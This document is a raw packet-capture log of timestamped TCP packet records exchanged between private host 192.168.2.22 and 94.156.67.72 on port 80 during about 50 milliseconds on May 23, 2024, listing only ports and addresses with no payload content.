May 23, 2024 20:21:05.978760004 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.979969025 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.980026007 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.982089043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.982140064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.982151985 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.982181072 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.982615948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.982669115 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.982722998 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.982769966 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.982918024 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.982975960 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.983454943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.983506918 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.983552933 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.983616114 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.983747005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.983798027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.983854055 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.983905077 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.984637022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.984692097 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.984747887 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.984797955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.984970093 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.985027075 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.985549927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.985601902 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.985694885 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.985745907 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.986049891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.986100912 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.986334085 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.986367941 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.986383915 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.986407042 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.986423969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.986469984 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.987165928 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.987220049 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.987267971 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.987314939 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.987524986 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.987571955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.988025904 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.988080025 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.988125086 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.988173008 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.988312960 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.988357067 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.988487959 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.988528967 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.988802910 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.988850117 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.988930941 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.988975048 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.989618063 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.989665031 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.989746094 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.989792109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.989943981 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.989988089 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.990509033 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.990554094 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.990606070 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.990648985 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.991063118 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.991106987 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.991175890 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.991189003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.991220951 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.991848946 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.991894960 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.991960049 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.992002964 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.992175102 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.992218018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.992686987 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.992727995 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.992816925 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.992861032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.993010998 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.993055105 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.993200064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.993242979 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.993530989 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.993575096 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.993710041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.993753910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.994406939 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.994457006 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.994477034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.994519949 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.994688988 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.994728088 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.995191097 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.995239019 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.995286942 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.995330095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.995721102 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.995767117 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.996022940 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.996036053 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.996066093 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.996078968 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.996150017 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.996191025 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.997509003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.997522116 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.997561932 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.997685909 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.997730017 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.997894049 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.997939110 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.998096943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.998159885 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.998428106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.998449087 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.998471975 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.998491049 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.998574972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.998616934 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.999222994 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.999269962 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.999327898 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.999397039 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.999552011 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.999594927 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.999975920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.999989986 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.000026941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.000740051 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.000751972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.000762939 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.000797033 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.000833035 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.000868082 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.000868082 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.001570940 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.001621008 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.001669884 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.001710892 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.001884937 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.001928091 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.002425909 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.002484083 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.002573013 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.002619028 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.002713919 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.002758980 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.003201962 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.003246069 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.003264904 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.003298998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.003473997 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.003521919 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.004050016 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.004101992 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.004174948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.004220963 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.004436970 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.004484892 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.004947901 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.004997969 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.004997969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.005037069 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.005410910 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.005460978 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.005553961 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.005573034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.005604982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.006272078 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.006323099 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.006459951 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.006500959 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.006609917 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.006656885 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.007164955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.007220030 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.007307053 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.007345915 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.008065939 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.008079052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.008091927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.008116007 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.008128881 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.008266926 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.008280039 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.008312941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.008775949 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.008822918 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.008897066 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.008939981 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.009567022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.009613037 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.009716034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.009761095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.009898901 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.009934902 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.010459900 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.010512114 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.010580063 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.010620117 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.010766029 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.010809898 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.011259079 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.011271954 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.011307955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.011374950 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.011418104 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.012083054 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.012130022 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.012223959 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.012267113 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.012634039 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.012679100 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.012770891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.012813091 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.012948036 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.012990952 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.013159990 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.013204098 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.013461113 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.013504982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.013621092 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.013663054 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.013794899 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.013839960 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.015882015 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.015908957 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.015932083 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.015942097 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.015953064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.015963078 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.015964031 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.015964031 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.015964031 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.015973091 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.015990019 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.016000986 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.016041994 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.016055107 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.016074896 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.016088009 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.016783953 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.016827106 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.016881943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.016915083 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.017124891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.017169952 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.017642021 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.017688036 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.017734051 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.017775059 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.017930984 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.017972946 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.018575907 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.018593073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.018627882 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.018748045 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.018759012 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.018793106 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.019191027 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.019234896 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.019737005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.019783974 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.019867897 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.019911051 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.020093918 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.020138979 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.020576000 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.020621061 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.020700932 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.020750999 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.020905018 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.020952940 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.021354914 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.021399021 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.021470070 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.021481037 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.021512032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.022186041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.022231102 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.022315979 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.022356987 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.022542000 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.022586107 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.023243904 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.023288965 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.023370028 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.023411036 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.023583889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.023627996 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.026432037 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026488066 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.026534081 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026546001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026556969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026568890 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026578903 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026588917 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026599884 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026619911 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.026631117 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.026710033 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026752949 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.026913881 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026926041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.026952982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.026962996 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.027132034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.027178049 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.027359009 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.027371883 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.027407885 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.028986931 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029000044 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029010057 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029021025 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029031992 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029036045 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.029045105 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.029063940 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.029086113 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.029301882 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029314041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029345989 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.029421091 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029460907 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.029634953 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.029678106 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.030142069 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.030188084 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.030239105 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.030278921 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.030456066 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.030517101 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.030920982 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.030961037 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.031044006 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.031085014 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.031233072 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.031275988 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.031732082 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.031775951 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.031856060 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.031866074 CEST	80	49169	94.156.67.72	192.168.2.22
